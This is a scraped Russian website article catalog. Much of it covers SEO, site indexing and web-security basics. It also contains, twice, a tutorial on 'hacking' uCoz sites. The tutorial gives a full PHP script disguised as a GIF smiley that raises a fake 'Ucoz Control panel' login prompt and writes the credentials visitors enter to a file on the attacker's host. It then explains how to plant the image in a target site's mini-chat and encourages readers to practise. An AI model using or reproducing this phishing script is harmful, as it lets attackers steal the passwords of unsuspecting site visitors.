| Статистика |
|---|
Онлайн всего: 1 Нубов: 1 Кемперов: 0 |
|
|
Понедельник, 13-Май-2024, 9.59.25 PM
Приветствую Вас Разведчик
Каталог статей
Всего материалов в каталоге: 9
Показано материалов: 1-9 |
|
Взлом сайта на UCOZ
Итак, начнем... Для начала
нажно зарегистировать хост с поддержкой php (например
http://mysite.phphost.net) . После регистрации льем на фтп скрипт и
ставим права на пустой .txt файл, например : passwords.txt (сюда будут
присылаться пассы пользователей похаканного сайта), и на файл
smile.gif. Также скачайте любой смайлик в расширении .gif (типа
cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее: header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?> Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь
выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева
юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так
вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите
логин, а в содержании сообщения напишите следующее: [IMG]http://mysite.phphost.net/smile.gif[/IMG] И
нажмите ОК. Если после этого в миничате вместо сообщения появился
смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех
кто будет заходить на данную страницу, (в этом примере это
http://target.ucoz.ru/) будет появлятся форма в которую нужно будет
ввести логин и пароль. У вас при входе на сайт такая форма будет
появлятся тоже. И все, введеные логины и пароли в эту форму будут
отсылатся в пустой файл passwords.txt, который вы создали в самом
начале и залили на фтп. Удачи! Практикуйтесь. Только на
некоторых сайтах эта уязвимость может и не пройти. Но стандрартно
созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем
спасибо за просмотр, надеюсь статья вам поможет =))) |
Зная
мои былые "шалости”, люди иногда предлагают мне повторить
некоторые трюки за деньги. Вчера я в очередной раз услышал конкретный
вопрос: "Сколько будет стоить взлом сайта … ?”
Вот что я хочу сказать по этму поводу: а сможете ли вы ответить на простой вопрос "Зачем?”
Зачем вам атаковать сайты конкурентов? Подумайте об этом прежде чем платить за это деньги!
Устроить DDoS и удерживать сайт в перегруженном
состоянии несколько дней – пока не отфильтруют. Да, сайт
прекратит работу на несколько часов. Но очень может получиться, что
этим вы устроите ему рекламу – сколько раз уже такое было. Более
того, себя вы прославите не как хакеров, а как DDoS-еров, лишённых
всякой сообразительности – это, пожалуй, самый тупой метод атаки.
Поискать XSS-уязвимости, возможности SQL-инъекций, другие методы скриптовых атак
– да, красиво. Можно взять сайт под контроль (если повезёт) и
стереть его или изменить – пока не придёт владелец и не зальёт
бэкап. Это несколько часов в лучшем случае, потом ошибки исправят, сайт
получит свою бесплатную рекламу, а вы – головную боль (вдруг
найдут). |
Виды взломов сайтов и их предотвращение
Данная статья не представляет собой всеобъемлющего руководства по
программированию безопасных сайтов, она описывает основные принципы
безопасности, о которых следует знать при программировании сайтов, и
предполагает наличие у читателя базовых навыков веб-программирования и
поиска информации в сети. Статья посвящена обзору основных путей взлома
веб-сайтов с рекомендациями по защите от них. Упор делается на
применение платформы PHP+MySQL, но основные принципы должны быть
применимы и для других платформ.
Одним из ключевых принципов безопасности сайта является то, что
любым данным, пришедшим извне, доверять нельзя. Даже если данные
предварительно проходят проверку с помощью JavaScript в браузере
пользователя (и не присылаются в случае его отключения). Даже если это
название (User-Agent) браузера пользователя. Даже если это cookie,
выставленные нашим же сайтом ранее. Все, что приходит извне, можно
подделать. К примеру, один из распространенных форумных движков некогда
взламывался из-за того, что злоумышленник посылал запрос с подделанным
cookie, вызывая этим SQL-инъекцию (см. далее).
Крайне рекомендуется по прочтении статьи поискать в интернете
дополнительную, возможно, новую, информацию по упоминающимся здесь
конкретным направлениям взлома.
Загрузка файлов
Сайт может позволять посетителям загружать свои файлы с последующим
отображением на своих страницах. Это могут быть, к примеру, изображения
в формате JPEG. Важно ограничить типы загружаемых файлов, чтобы вместо
картинки не был бы загружен исполняемый файл.
При загрузке файла PHP в переменной $_FILES['userfile']['type'] возвращает mime-тип файла, для JPEG-изображения это будет image/jpeg.
Может показаться, что проверка этого типа достаточна для уверенности в
том, что загружено именно изображение. Также встречается идея пытаться
читать файл изображения функциями getimagesize или imаgecreatefromjpeg. Однако тип файла здесь определяется на основе содержания, так что правильное JPEG-изображение, сохраненное с расширением .php, будет определено как image/jpeg. А называться будет xxxxx.php.
Веб-сервер же, принимающий решение об обработчике (handler) для того
или иного файла, смотрит именно на расширение. Злоумышленник берет
корректную картинку, приписывает к ней в конец (или в EXIF-данные)
php-скрипт, и сервер его исполняет, мы взломаны.
Таким образом, контролировать для обеспечения безопасности следует
именно расширение файла, а проверки через определение mime-type и через
попытку открыть файл функцией getimagesize имеют смысл только для контроля того, что вместо картинки не будет загружен мусор, безвредный, но картинкой не являющийся. |
Взлом сайта на UCOZ
Привет.
Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий
хакер может найти достаточно много уязвимостей на таких сайтах и знает
много способов их взлома. Я надеюсь что скоро тоже буду таким=).
Итак, начнем...
Для
начала нажно зарегистировать хост с поддержкой php (например
http://mysite.phphost.net) . После регистрации льем на фтп скрипт и
ставим права на пустой .txt файл, например : passwords.txt (сюда будут
присылаться пассы пользователей похаканного сайта), и на файл
smile.gif. Также скачайте любой смайлик в расширении .gif (типа
cool.gif).
Затем откройте блокнот, да простой блокнот и напишите следующее:
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif.
Теперь
выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева
юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так
вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите
логин, а в содержании сообщения напишите следующее:
[IMG]http://mysite.phphost.net/smile.gif[/IMG]
И
нажмите ОК. Если после этого в миничате вместо сообщения появился
смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех
кто будет заходить на данную страницу, (в этом примере это
http://target.ucoz.ru/) будет появлятся форма в которую нужно будет
ввести логин и пароль. У вас при входе на сайт такая форма будет
появлятся тоже. И все, введеные логины и пароли в эту форму будут
отсылатся в пустой файл passwords.txt, который вы создали в самом
начале и залили на фтп.
Удачи! Практикуйтесь. Только на
некоторых сайтах эта уязвимость может и не пройти. Но стандрартно
созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем
спасибо за просмотр, надеюсь статья вам поможет =)))
Особое
спасибо нашему порталу hackzone.ru за то, что он такой хороший ))). А
также всем участникам хакзоны которые мне помогали во всем, советовали
мне нужные вещи и помогают по сей день.
При копировании материалов ссылка на css-mir.ucoz.ru обязательна |
И снова я с конкретным предложением уникальная партнёрка, это достаточно новая и уже проверенная партнёрка. Как же она работает? А вот как:
1) Ваш сайт будет выведен в топы в поисковиках за счёт элитной
установки ссылок цена всего 2.5$ сутки, В эту цену входит размещение
ссылок на ваш сайт на 400 сайтов, а также интерфейс для настройки
разных ссылок и разных текстов к ним, и специальный механизм генерации
ссылок. |
Прежде чем писать в эту тему, Прочтите FAQ по uCoz & Yandex. В: Как помочь роботу "найти мой сайт" Вы можете сообщить роботу о появлении нового сайта с помощью формы добавления сайта. В: Индексируется ли мой сайт и как это проверить? Проверить индексацию сайта вы можете здесь. В:Я недавно добавил сайт, а он до сих пор не проиндексирован! |
|
Преамбула.
Любой сайт, каким бы хорошим он ни был
начинает жить только когда его посещают люди. И для этого нужны сервисы
статистики о которых пойдет речь. Нужны они и чисто с информативной
точки зрения о том, сколько и откуда людей посещают сайт, и для того
что бы грамотно организовать раскрутку (продвижение сайта).
Тут
есть 2 направления – анализировать чужую статистику, тем самым
понимая какими являются потенциальные источники посетителей для вас.
Анализировать свою статистику. Улавливать откуда идут к вам люди,
предпринимать те или иные действия что бы увеличивать приток
посетителей откуда это возможно. Следить за тем, что интересно людям
заходящем на сайт, ради чего они пришли, к примеру, ориентируясь на те
поисковые запросы, что их приводят и по тому какие страницы они
просматривают.
Эту, и многую другую весьма полезную информацию,
мы с вами можем получать от сервисов статистики, и при грамотном ее
использование достигать все новых и новых вершин |
И так, надеюсь кому-нибудь пригодится - так на форуме встречается множество "далеких" людей. Основы раскрутки-1, Основы раскрутки-2
Предлагайте
посетителям своего сайта, только ценную информацию. Это залог успеха!
Чем ценней информация, тем легче работа по продвижению сайта.
Отсутствие орфографических ошибок. Используйте соответствующие орфографические программы.
Не менее 300 слов на странице.
Качественный текст полезной информации сам по себе богат ключевыми словами.
Помните, каждое ключевое слово не должно превышать соотношение 10% от всего текста - оптимально 5-7%. |
|
Как ускорить индексацию сайта - этот вопрос часто можно встретить на
форумах вебмастеров. От индексации зависит очень многое: позиции сайта
в поисковиках, количество посетителей с них, популярность ресурса, и, в
конечном итоге, прибыль с сайта. Я собрал способы, которые я опробовал
при продвижении сайтов и которые действительно эффективны для улучшения
и ускорения индексации сайта поисковыми системами. По
направленности все способы можно разделить на две категории -
внутренняя оптимизация сайта и работа с внешними факторами. По
финансовым затратам - бесплатные и платные способы. Как ускорить индексацию сайта - бесплатные способы
1. Создайте карту сайта для Google (sitemap) в формате xml. Для
создания html и xml карт для своего сайта воспользуйтесь
онлайн-генератором XML-Sitemaps.com,
который бесплатно обрабатывает до 500 страниц. После генерации
сохраняете sitemap в корне своего сайта в формате xml. Для того, чтобы
скормить xml-карту поисковой систему Google, нужно зарегистрировать
аккаунт в Сервисе Google Webmaster,
и затем в меню Sitemap добавить ссылку на вашу xml-карту вида
ваш_сайт/sitemap.xml. После регистрации в этом сервисе можно настроить
русский язык интерфейса. По моим наблюдениям, после добавления sitemap
в Google робот этой поисковой системы начинает чаще заглядывать на ваш
сайт и лучше его индексировать. Кроме того, сервис Google для
вебмастеров предлагает много полезных опций. 2. Создайте html
карту сайта в 1 клике от главной страницы, на которой находятся ссылки
на все страницы вашего сайта. Если страниц очень много, то разбейте
карту сайта на несколько страниц. Разместите ссылку на карту сайта на
всех страницах. 3. Зарегистрируйтесь в сервисе Яндекс.Вебмастер
и добавьте свой сайт, что позволит отслеживать индексацию страниц сайта
Яндексом, а также пользоваться другими полезнымыми функциями.
4. Регистрация в каталогах - если вы еще не регистрировали сайт в
каталогах, то советую сделать это. Подробнее о регистрации в каталогах
читайте тут: "Как регистрировать сайт в каталогах".
Можно регистрировать сайт вручную. Искать каталоги можно, набрав запрос
"каталог сайтов" в любом поисковике. Это очень долгий и трудоемкий
процесс. Можно купить программу Allsubmitter с базами каталогов,
которая значительно облегчает регистрацию в каталогах. Можно заказать
прогон по каталогам (например, на форуме forum.searchengines.ru). Можно использовать специальные сервисы регистрации в каталогах:
1ps.ru
autoreg.ru
uhuhu.ru. |
|
|
|
